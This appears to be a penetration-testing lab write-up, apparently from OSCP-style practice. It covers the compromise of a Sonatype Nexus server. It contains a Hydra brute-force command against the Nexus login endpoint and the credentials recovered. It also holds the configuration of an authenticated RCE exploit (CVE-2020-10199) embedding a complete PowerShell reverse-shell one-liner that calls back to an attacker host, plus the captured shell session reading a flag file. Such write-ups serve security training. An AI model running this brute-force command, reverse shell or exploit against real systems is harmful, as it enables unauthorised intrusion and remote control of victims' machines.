The Nexus Repository Manager UI on 192.168.165.61:8081 needs credentials, so the first step is to build a candidate wordlist from the words on the site itself with CeWL — once lowercased and once as-is (presumably saved as the `users.lower` / `pass.lower` lists that Hydra is given below):
$ cewl --lowercase 192.168.165.61:8081
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
nexus
repository
manager
loading
new
image
src
http
static
rapture
resources
favicon
ico
oss
product
logo
spinner
browse
history
form
$ cewl 192.168.165.61:8081
CeWL 6.1 (Max Length) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Nexus
Repository
Manager
Loading
new
Image
src
http
static
rapture
resources
favicon
ico
OSS
Product
Logo
Spinner
Browse
history
form
$ hydra -I -f -vV -L users.lower -P pass.lower 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:F=/403'
nexus:nexus — Hydra's hit (`-f` stops at the first valid pair). The `^USER64^`/`^PASS64^` placeholders make Hydra base64-encode each candidate before submitting it, which is the form the Nexus `/service/rapture/session` login endpoint expects; `F=/403` is the failure marker matched against the response (Nexus answers a bad login with a 403), so anything else is reported as a success.
$ searchsploit -m 49385
Exploit: Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/49385
Path: /usr/share/exploitdb/exploits/java/webapps/49385.py
Codes: CVE-2020-10199
Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /home/adot/oscp/pg/billyboss/49385.py
Changed the following constants at the top of 49385.py: the target URL, the credentials Hydra found, and the command the exploit executes, which here is a PowerShell reverse shell back to the attack box (192.168.45.233:1337, matching the nc listener below), base64-encoded as UTF-16LE because that is what `powershell -e` expects. The exploit is written for Nexus 3.21.1 and the install directory visible in the resulting shell prompt is nexus-3.21.0-05, so the target is within the version range it covers. Decode and read any encoded blob like this before reusing it (`base64 -d | iconv -f UTF-16LE`) rather than running it blind — the callback address is embedded inside it.
#!/usr/bin/python3
import sys
import base64
import requests
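# Target Nexus instance (the web UI found on 8081) and the credentials Hydra
# recovered for it. The rest of 49385.py (not shown here) presumably reads
# URL / USERNAME / PASSWORD / CMD as-is, so those four names are kept.
URL = 'http://192.168.165.61:8081'
USERNAME = 'nexus'
PASSWORD = 'nexus'

# Attack box listener the reverse shell calls back to; must match `nc -lnvp`.
LHOST = '192.168.45.233'
LPORT = 1337

# Plain-text PowerShell TCP reverse shell (the standard one-liner): connect
# back to LHOST:LPORT, read a command, `iex` it, and send the output back
# followed by a "PS <cwd>> " prompt, until the listener closes the socket.
# Only the first fragment is an f-string so the `{0}` in the PowerShell
# scriptblock does not need escaping.
_PS_REVERSE_SHELL = (
    f'$client = New-Object System.Net.Sockets.TCPClient("{LHOST}",{LPORT});'
    '$stream = $client.GetStream();'
    '[byte[]]$bytes = 0..65535|%{0};'
    'while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;'
    '$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);'
    '$sendback = (iex $data 2>&1 | Out-String );'
    '$sendback2 = $sendback + "PS " + (pwd).Path + "> ";'
    '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);'
    '$stream.Write($sendbyte,0,$sendbyte.Length);'
    '$stream.Flush()};$client.Close()'
)


def _encoded_command(script: str) -> str:
    """Return ``powershell -e "<b64>"`` for *script*.

    ``powershell -e`` (EncodedCommand) expects the script base64-encoded as
    UTF-16LE, not UTF-8, which is why ``script.encode()`` alone would not
    produce a runnable blob.

    Args:
        script: PowerShell source to encode.

    Returns:
        The full command line to hand to the exploit.
    """
    blob = base64.b64encode(script.encode('utf-16-le')).decode('ascii')
    return f'powershell -e "{blob}"'


# Command the exploit executes on the target. Generated from the readable
# script above so LHOST/LPORT are visible and easy to change; the result is
# the same value the previous hard-coded base64 blob held.
CMD = _encoded_command(_PS_REVERSE_SHELL)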
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.165.61] 50495
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami
billyboss\nathan
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> type C:\Users\nathan\Desktop\local.txt
61c713a04f0379089cb7deed6307f442
PS C:\Users\nathan\Nexus\nexus-3.21.0-05> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.165.61
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.165.254
PS C:\Users\nathan\Nexus\nexus-3.21.0-05>